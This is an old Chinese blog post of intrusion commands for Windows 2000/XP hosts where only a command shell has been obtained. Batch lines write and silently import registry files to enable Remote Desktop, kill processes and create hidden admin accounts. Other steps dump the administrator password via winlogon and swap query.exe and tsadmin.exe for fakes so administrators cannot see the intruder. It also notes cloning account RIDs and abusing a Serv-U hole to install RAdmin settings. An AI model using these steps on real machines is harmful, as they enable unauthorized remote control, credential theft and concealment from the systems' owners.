2000 XP 开3389

原创 2007年09月23日 13:45:00
 

HTML Tags and JavaScript tutorial



2000 XP 开3389





echo Windows Registry Editor Version 5.00 >>3389.reg
echo [HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/netcache] >>3389.reg
echo "Enabled"="0" >>3389.reg
echo [HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Winlogon] >>3389.reg
echo "ShutdownWithoutLogon"="0" >>3389.reg
echo [HKEY_LOCAL_MACHINE/SOFTWARE/Policies/Microsoft/Windows/Installer] >>3389.reg
echo "EnableAdminTSRemote"=dword:00000001 >>3389.reg
echo [HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control/Terminal Server] >>3389.reg
echo "TSEnabled"=dword:00000001 >>3389.reg
echo [HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Services/TermDD] >>3389.reg
echo "Start"=dword:00000002 >>3389.reg
echo [HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Services/TermService] >>3389.reg
echo "Start"=dword:00000002 >>3389.reg
echo [HKEY_USERS/.DEFAULT/Keyboard Layout/Toggle] >>3389.reg
echo "Hotkey"="1" >>3389.reg
echo [HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control/Terminal Server/Wds/rdpwd/Tds/tcp]>> 3389.reg
echo "PortNumber"=dword:00000D3D >>3389.reg
echo [HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control/Terminal Server/WinStations/RDP-Tcp] >>3389.reg
echo "PortNumber"=dword:00000D3D >>3389.reg
 regedit /s 3389.reg
列举进程的脚本。
 
@echo for each ps in getobject _ >ps.vbs
@echo ("winmgmts://./root/cimv2:win32_process").instances_ >>ps.vbs
@echo wscript.echo ps.handle^&vbtab^&ps.name^&vbtab^&ps.executablepath:next >>ps.vbs
cscript ps.vbs
ntsd -c q -p 200
 
echo Windows Registry Editor Version 5.00 >>3389.reg
echo [HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control/Terminal Server] >>3389.reg
echo "fDenyTSConnections"=dword:00000000 >>3389.reg
regedit /s 3389.reg
查询终端服务端口:reg query "HKEY_LOCAL_MACHINE/System/CurrentControlSet/Control/Terminal Server/WinStations/RDP-TCP-PortNumber"
 
 
登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉
可以写两个bat文件
@echo off
@copy c:/winnt/system32/query.exe c:/winnt/system32/com/1/que.exe
@del c:/winnt/system32/query.exe
@del %SYSTEMROOT%/system32/dllcache/query.exe
@copy c:/winnt/system32/com/1/query.exe c:/winnt/system32/query.exe //复制一个假的
@echo off
@copy c:/winnt/system32/tsadmin.exe c:/winnt/system32/com/1/tsadmin.exe
@del c:/winnt/system32/tsadmin.exe
@del %SYSTEMROOT%/system32/dllcache/tsadmin.exe
 
 
 
一些很有用的老知识
type c:/boot.ini ( 查看系统版本 )
net start (查看已经启动的服务)
query user ( 查看当前终端连接 )
net user ( 查看当前用户 )
net user 用户 密码/add ( 建立账号 )
net localgroup administrators 用户 /add (提升某用户为管理员)
ipconfig -all ( 查看IP什么的 )
netstat -an ( 查看当前网络状态 )
findpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)
克隆时Administrator对应1F4
guest对应1F5
tsinternetuser对应3E8
如果对方没开3389,但是装了Remote Administrator Service
用这个命令F:/ftp.exe "regedit -s F:/longyi.biz/RAdmin.reg" 连接
解释:用serv-u漏洞导入自己配制好的radmin的注册表信息
先备份对方的F:/ftp.exe "regedit -e F:/1.reg HKEY_LOCAL_MACHINE/SYSTEM/RAdmin"
 


版权声明:本文为博主原创文章,未经博主允许不得转载。

相关文章推荐

CMD 下开3389命令 2000 2003/XP 适用于只得到CMD的条件下入侵

一、win 2k下终端开启终端 首先用ECHO写一个3389.reg文件,然后导入到注册表,echo代码如下: echo Windows Registry Editor Version 5.0...

xp/win7修改远程桌面端口号3389的方法,超级详细的哦!

首先

XP自带远程桌面连接3389

  • 2012-11-20 14:09
  • 418KB
  • 下载

3389XP远程桌面管理

  • 2013-03-20 20:31
  • 742KB
  • 下载

Windows 2000、Windows XP 和 Windows 2003 Server定时开机与关机设置

http://phigo.bokee.com/6772143.html Windows 2000、Windows XP 和 Windows 2003 Server定时开机与关机设置   移步至个人...
  • wjh168
  • wjh168
  • 2012-04-06 09:56
  • 1565

开发Windows 2000/XP下的防火墙-IPFilter技术介绍

开发Windows 2000/XP下的防火墙 作者:Jesús O 翻译:PowerCPP 下载本文配套源代码  介绍 如果你决定开发LINUX下的防火墙,你会找到很多免费的信息...

让Windows 2000/XP自动关机

让Windows 2000/XP自动关机 如果你想出门,但电脑又正在进行工作,这时就要用到自动关机。大多数实现自动关机的 方法都是使用一些第三方软件,这样不仅麻烦,而且为实现这个小功能而专门动用一...

Windows XP/2000实现自动登陆

Windows XP/2000实现自动登陆:不管计算机是否已加域,都可以通过更改注册表的方法来实现。 在注册表HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows...

解决SQL server 2000 个人版 XP能用 不能在win7 64位系统上安装的问题

最近学习到数据库这个课程,但是看见
内容举报
返回顶部
收藏助手
不良信息举报
您举报文章:深度学习:神经网络中的前向传播和反向传播算法推导
举报原因:
原因补充:

(最多只允许输入30个字)